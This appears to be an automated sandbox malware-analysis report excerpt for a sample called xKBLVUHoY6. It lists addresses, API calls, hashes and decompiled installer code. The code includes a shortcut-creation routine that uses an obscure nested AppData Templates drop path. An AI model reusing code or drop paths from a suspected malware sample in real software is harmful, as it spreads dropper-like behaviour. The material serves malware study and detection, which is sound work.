0x00000000
0x00000000
0x6e552196
0x00000000
0x00000000
0x6e55219a
0x00000000
0x00000000
0x6e5521a2
0x00000000
0x00000000
0x6e5520d3
0x6e5520d5
0x6e5520d5
0x00000000
0x00000000
0x6e55209d
0x6e55209f
0x6e55209f
0x00000000
0x00000000
0x6e5520af
0x6e5520b1
0x6e5520b1
0x00000000
0x00000000
0x6e5520e1
0x6e5520e3
0x6e5520e3
0x00000000
0x00000000
0x6e5520ba
0x6e5520bc
0x6e5520bc
0x00000000
0x00000000
0x6e5520c1
0x00000000
0x00000000
0x6e55219e
0x6e5521a8
0x6e5521a8
0x00000000
0x00000000
0x6e5520ec
0x6e5520f0
0x6e5520f5
0x6e5520f8
0x6e5520f9
0x6e5520fc
0x6e552102
0x6e552102
0x00000000
0x00000000
0x6e55218e
0x00000000
0x00000000
0x6e5520c5
0x6e5520c7
0x6e5520c7
0x00000000
0x00000000
0x6e551fc3
0x6e551fc3
0x00000000
0x00000000
0x6e5520da
0x6e5520dc
0x6e5520dc
0x00000000
0x00000000
0x6e551f67
0x6e551f6d
0x6e551f70
0x6e551f72
0x6e551f72
0x6e551f75
0x6e551f79
0x6e551f86
0x6e551f88
0x6e551f8e
0x6e551f8e
0x6e551f8e
0x00000000
0x00000000
0x6e55208e
0x6e55208e
0x6e552090
0x6e552097
0x00000000
0x00000000
0x6e5520d6
0x6e5520d6
0x00000000
0x00000000
0x6e5520a0
0x6e5520a0
0x6e5520a2
0x6e5520a9
0x00000000
0x00000000
0x6e5520b2
0x6e5520b2
0x6e5520b4
0x00000000
0x00000000
0x6e5520e4
0x6e5520e4
0x00000000
0x00000000
0x6e5520bd
0x6e5520bd
0x00000000
0x00000000
0x6e55210a
0x6e55210e
0x6e552113
0x6e552116
0x00000000
0x00000000
0x6e5520c8
0x6e5520c8
0x6e5520cb
0x6e5520cd
0x00000000
0x00000000
0x6e5520dd
0x6e5520dd
0x6e5520e6
0x6e5520e6
0x6e551fc5
0x6e551fc5
0x6e551fc8
0x6e551fcf
0x6e551fd1
0x6e551fd3
0x6e551fda
0x6e551fdd
0x6e551fe2
0x6e551fe4
0x6e551fe6
0x6e551fea
0x6e551ff0
0x6e551ff6
0x6e551ff6
0x6e551ff8
0x6e551ff8
0x6e551ff9
0x6e551ff9
0x6e551ffd
0x6e552003
0x6e552005
0x6e552009
0x6e55200e
0x6e55200e
0x6e552010
0x6e552010
0x6e552013
0x6e552016
0x6e55201f
0x6e552025
0x6e552028
0x6e552028
0x6e55202a
0x6e55202d
0x6e552033
0x6e552039
0x6e552039
0x6e55203b
0x00000000
0x00000000
0x6e552041
0x6e552041
0x6e552045
0x6e55204c
0x6e552070
0x6e552070
0x6e552074
0x6e552076
0x6e552079
0x6e552079
0x6e55207c
0x6e55207c
0x00000000
0x6e552074
0x6e552051
0x6e552054
0x6e552054
0x6e55205b
0x6e55205d
0x6e552060
0x6e552067
0x6e552068
0x6e55206e
0x6e55206e
0x00000000
0x6e55206e
0x6e552062
0x6e552065
0x00000000
0x00000000
0x00000000
0x6e552065
0x6e551ff2
0x6e551ff4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e551f60
0x6e551e05
0x6e551e05
0x6e551e06
0x6e551f46
0x00000000
0x6e551f46
0x6e551e0c
0x6e551e0d
0x00000000
0x00000000
0x6e551e13
0x6e551e16
0x6e551f0b
0x6e551f0b
0x6e551f0e
0x6e551f23
0x6e551f25
0x6e551f25
0x6e551f26
0x6e551f29
0x6e551f2c
0x6e551f38
0x6e551f38
0x6e551f38
0x6e551f2e
0x6e551f2e
0x6e551f2e
0x6e551f3e
0x00000000
0x6e551f3e
0x6e551f10
0x6e551f10
0x6e551f11
0x6e551f1f
0x00000000
0x6e551f1f
0x6e551f14
0x6e551f15
0x00000000
0x00000000
0x6e551f1b
0x00000000
0x6e551f1b
0x6e551e1c
0x6e551f07
0x00000000
0x6e551f07
0x6e551e22
0x6e551e22
0x6e551e25
0x6e551e4e
0x00000000
0x6e551e4e
0x6e551e27
0x6e551e27
0x6e551e2a
0x6e551e44
0x00000000
0x6e551e44
0x6e551e2c
0x6e551e2c
0x6e551e2f
0x6e551e3e
0x00000000
0x6e551e3e
0x6e551e32
0x6e551e33
0x00000000
0x00000000
0x6e551e35
0x00000000
0x6e551cec
0x6e551cec
0x6e551cef
0x00000000
0x6e551cef
0x6e551ce6
0x6e551cd3
0x6e551cd8
0x00000000
0x00000000
0x6e551cda
0x6e551cdd
0x00000000
0x00000000
0x00000000
0x6e551cdd
0x6e551c6d
0x6e551c70
0x6e551ca6
0x6e551ca9
0x00000000
0x6e551caf
0x6e551cb1
0x6e551cb5
0x6e551cbc
0x6e551cc3
0x6e551cc6
0x6e551cc9
0x00000000
0x6e551cc9
0x6e551ca9
0x6e551c72
0x6e551c73
0x6e551c8e
0x6e551c91
0x00000000
0x6e551c97
0x6e551c97
0x6e551c9e
0x6e551ca1
0x00000000
0x6e551ca1
0x6e551c91
0x6e551c78
0x00000000
0x6e551c7e
0x6e551c7e
0x6e551c85
0x00000000
0x6e551c85
0x6e551c78
0x6e551e74
0x6e551e79
0x6e551e7e
0x6e551e82
0x6e552355
0x6e55235b
0x6e551e94
0x6e551e96
0x6e551e97
0x6e55227e
0x6e55227e
0x6e552281
0x6e552284
0x6e5522a1
0x6e5522a7
0x6e5522a9
0x6e5522af
0x6e5522c6
0x6e5522c6
0x6e5522c6
0x6e5522d3
0x6e5522d9
0x6e5522dc
0x6e5522e2
0x6e5522e4
0x6e5522e8
0x6e5522ea
0x6e5522f1
0x6e5522f6
0x6e5522f9
0x6e5522fb
0x6e552300
0x6e552312
0x6e552312
0x6e552300
0x6e5522f9
0x6e5522e8
0x6e552318
0x6e55231b
0x6e552325
0x6e55232d
0x6e55233a
0x6e552340
0x6e552343
0x6e552273
0x6e552273
0x00000000
0x6e552273
0x6e552349
0x6e55234f
0x6e55234f
0x00000000
0x00000000
0x6e552351
0x6e552351
0x6e552351
0x6e552351
0x00000000
0x6e55231d
0x6e55231d
0x6e552323
0x00000000
0x00000000
0x00000000
0x6e552323
0x6e55231b
0x6e5522b2
0x6e5522b8
0x6e5522ba
0x6e5522c0
0x00000000
0x00000000
0x00000000
0x6e5522c0
0x6e552286
0x6e55228d
0x6e552293
0x6e552299
0x00000000
0x6e552299
0x6e551e9d
0x6e551e9e
0x6e55225d
0x6e55225d
0x6e552263
0x6e552266
0x00000000
0x00000000
0x6e55226d
0x6e552272
0x00000000
0x6e552272
0x6e551ea5
0x00000000
0x00000000
0x6e551eab
0x6e551eab
0x6e551eb4
0x6e551eb9
0x6e551ebf
0x00000000
0x00000000
0x6e551ec5
0x6e551ed2
0x6e551ed8
0x6e551ee2
0x6e551ee8
0x6e551ef0
0x6e551f00
0x00000000
0x6e551f00

APIs

Part of subcall function 6E5512BB: GlobalAlloc.KERNELBASE(00000040,?,6E5512DB,?,6E55137F,00000019,6E5511CA,-000000A0), ref: 6E5512C5

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6E551D2D
lstrcpyW.KERNEL32(00000008,?), ref: 6E551D75
lstrcpyW.KERNEL32(00000808,?), ref: 6E551D7F
GlobalFree.KERNEL32(00000000), ref: 6E551D92
GlobalFree.KERNEL32(?), ref: 6E551E74
GlobalFree.KERNEL32(?), ref: 6E551E79
GlobalFree.KERNEL32(?), ref: 6E551E7E
GlobalFree.KERNEL32(00000000), ref: 6E552068
lstrcpyW.KERNEL32(?,?), ref: 6E552222
GetModuleHandleW.KERNEL32(00000008), ref: 6E5522A1
LoadLibraryW.KERNEL32(00000008), ref: 6E5522B2
GetProcAddress.KERNEL32(?,?), ref: 6E55230C
lstrlenW.KERNEL32(00000808), ref: 6E552326

Memory Dump Source

Source File: 00000000.00000002.1491224488.000000006E551000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E550000, based on PE: true

Associated: 00000000.00000002.1491166706.000000006E550000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491295904.000000006E554000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491349838.000000006E556000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e550000_xKBLVUHoY6.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: a0ed13d976aedcc6ac59597b049f89d45ee7dfe6f7003118fded54b13ad1392c
Instruction ID: a476edda8018d26ef4b81cfa55038a678f750dc85fdc62988f6397f4f011e1f9
Opcode Fuzzy Hash: a0ed13d976aedcc6ac59597b049f89d45ee7dfe6f7003118fded54b13ad1392c
Instruction Fuzzy Hash: 1422BC75D14A06DECB50CFE9CA806EEBBF4FB06305F20892BD1A5A7350E77059A9CB50

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E4D( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially\\Tygnings\\systemless");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless, xrefs: 00402269

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless
API String ID: 542301482-3312953533
Opcode ID: 6e6039761b8ed932a5d0a2857343db2613ced47da6fc2a90746a7ff2092a7e80
Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
Opcode Fuzzy Hash: 6e6039761b8ed932a5d0a2857343db2613ced47da6fc2a90746a7ff2092a7e80
Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404ED0(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a248;
				_v28 =  *0x42a230 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a239 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E1E(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a238) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x4236ec;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423700;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x4236ec = 0;
								 *0x423700 = 0;
								 *0x42a280 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a239 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404E9E();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423700;
									_t201 =  *0x42a248;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a24c <= 0) {
										L86:
										if( *0x42a2de == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x4291fc + 0x10)) != 0) {
											E00404DD9(0x3ff, 0xfffffffb, E00404DF1(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a24c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423700);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a280 = _t291;
					 *0x423700 = GlobalAlloc(0x40,  *0x42a24c << 2);
					_t258 = LoadImageW( *0x42a220, 0x6e, 0, 0, 0, 0);
					 *0x4236f4 =  *0x4236f4 | 0xffffffff;
					_t297 = _t258;
					 *0x4236fc = SetWindowLongW(_v8, 0xfffffffc, E004054DD);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x4236ec = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x4236ec);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406544(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404463(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404463(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a24c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423700 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423700 + _t300 * 4) = _t284;
									_v16 =  *( *0x423700 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a24c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404498(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404498(_v12);
								L93:
								return E004044CA(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404ed7
0x00404ef0
0x00404ef5
0x00404efd
0x00404f03
0x00404f19
0x00404f1c
0x00405147
0x0040514e
0x00405162
0x00405150
0x00405152
0x00405155
0x00405156
0x0040515d
0x0040515d
0x0040516e
0x0040517c
0x0040517f
0x00405195
0x0040520a
0x0040520d
0x0040520f
0x00405219
0x00405227
0x00405227
0x00405229
0x00405233
0x00405239
0x0040523c
0x0040523f
0x0040525a
0x00405241
0x0040524b
0x0040524b
0x0040523f
0x00405233
0x00000000
0x0040520d
0x0040519a
0x004051a5
0x004051aa
0x004051b1
0x004051b6
0x004051ba
0x004051c5
0x004051c5
0x004051c9
0x004051cd
0x004051d1
0x004051e4
0x004051d3
0x004051d3
0x004051da
0x004051e0
0x004051dc
0x004051dc
0x004051dc
0x004051da
0x004051e8
0x004051ea
0x004051fd
0x00405200
0x00405203
0x00405203
0x004051cd
0x00000000
0x004051ba
0x0040519c
0x004051a3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040525d
0x0040525d
0x00405264
0x004052d5
0x004052dd
0x004052e5
0x004052e5
0x004052ee
0x004052f0
0x004052f7
0x004052fa
0x004052fa
0x00405300
0x00405307
0x0040530a
0x0040530a
0x00405310
0x00405316
0x0040531c
0x0040531c
0x00405329
0x0040548a
0x00405491
0x004054ae
0x004054b4
0x004054c6
0x004054c6
0x00000000
0x0040532f
0x00405331
0x00405336
0x0040533b
0x00405340
0x00405342
0x00405342
0x00405343
0x00405344
0x00405346
0x00405346
0x0040534e
0x0040538f
0x00405391
0x004053a1
0x004053a4
0x004053a9
0x004053b0
0x004053b3
0x00405455
0x0040545e
0x00405466
0x00405466
0x00405474
0x00405485
0x00405485
0x00000000
0x00405474
0x004053b9
0x004053bc
0x004053c2
0x004053c7
0x004053c9
0x004053cb
0x004053d1
0x004053d8
0x004053dd
0x004053e4
0x004053e7
0x004053e7
0x004053ee
0x004053fa
0x004053fe
0x00405400
0x00405400
0x004053f0
0x004053f2
0x004053f2
0x00405420
0x0040542c
0x0040543b
0x0040543b
0x0040543d
0x00405440
0x00405449
0x00000000
0x00405350
0x0040535b
0x0040535e
0x00405363
0x00405365
0x00405369
0x00405379
0x00405383
0x00405385
0x00405388
0x00000000
0x00000000
0x00000000
0x00000000
0x0040536b
0x0040536b
0x00405371
0x00405373
0x00405373
0x00405374
0x00405375
0x00000000
0x0040536b
0x0040534e
0x00405329
0x0040526c
0x00000000
0x00405282
0x0040528c
0x00405291
0x00000000
0x00000000
0x004052a3
0x004052a8
0x004052b4
0x004052b4
0x004052b6
0x004052c5
0x004052c7
0x004052cb
0x004052ce
0x00000000
0x004052ce
0x0040526c
0x00404f22
0x00404f27
0x00404f30
0x00404f37
0x00404f49
0x00404f54
0x00404f5a
0x00404f68
0x00404f7c
0x00404f81
0x00404f8e
0x00404f93
0x00404fa9
0x00404fba
0x00404fc7
0x00404fc7
0x00404fca
0x00404fd0
0x00404fd2
0x00404fd5
0x00404fda
0x00404fdf
0x00404fe1
0x00404fe1
0x00405001
0x00405001
0x00405003
0x00405004
0x00405009
0x0040500f
0x00405013
0x00405018
0x00405020
0x00405024
0x00405029
0x0040502e
0x00405036
0x00405039
0x00405109
0x0040511c
0x00000000
0x0040503f
0x00405042
0x00405045
0x00405048
0x00405048
0x0040504e
0x00405057
0x0040505a
0x0040505e
0x00405061
0x00405064
0x0040506d
0x00405076
0x00405079
0x0040507c
0x0040507f
0x004050bd
0x004050e8
0x004050bf
0x004050ce
0x004050ce
0x00405081
0x00405084
0x00405092
0x0040509c
0x004050a4
0x004050ab
0x004050b6
0x004050b6
0x0040507f
0x004050ee
0x004050ef
0x004050fb
0x004050fb
0x00405107
0x00405122
0x00405125
0x00405142
0x00000000
0x00405127
0x0040512c
0x00405135
0x004054c8
0x004054da
0x004054da
0x00405125
0x00000000
0x00405107
0x00405039

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404EE8
GetDlgItem.USER32(?,00000408), ref: 00404EF3
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F54
SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
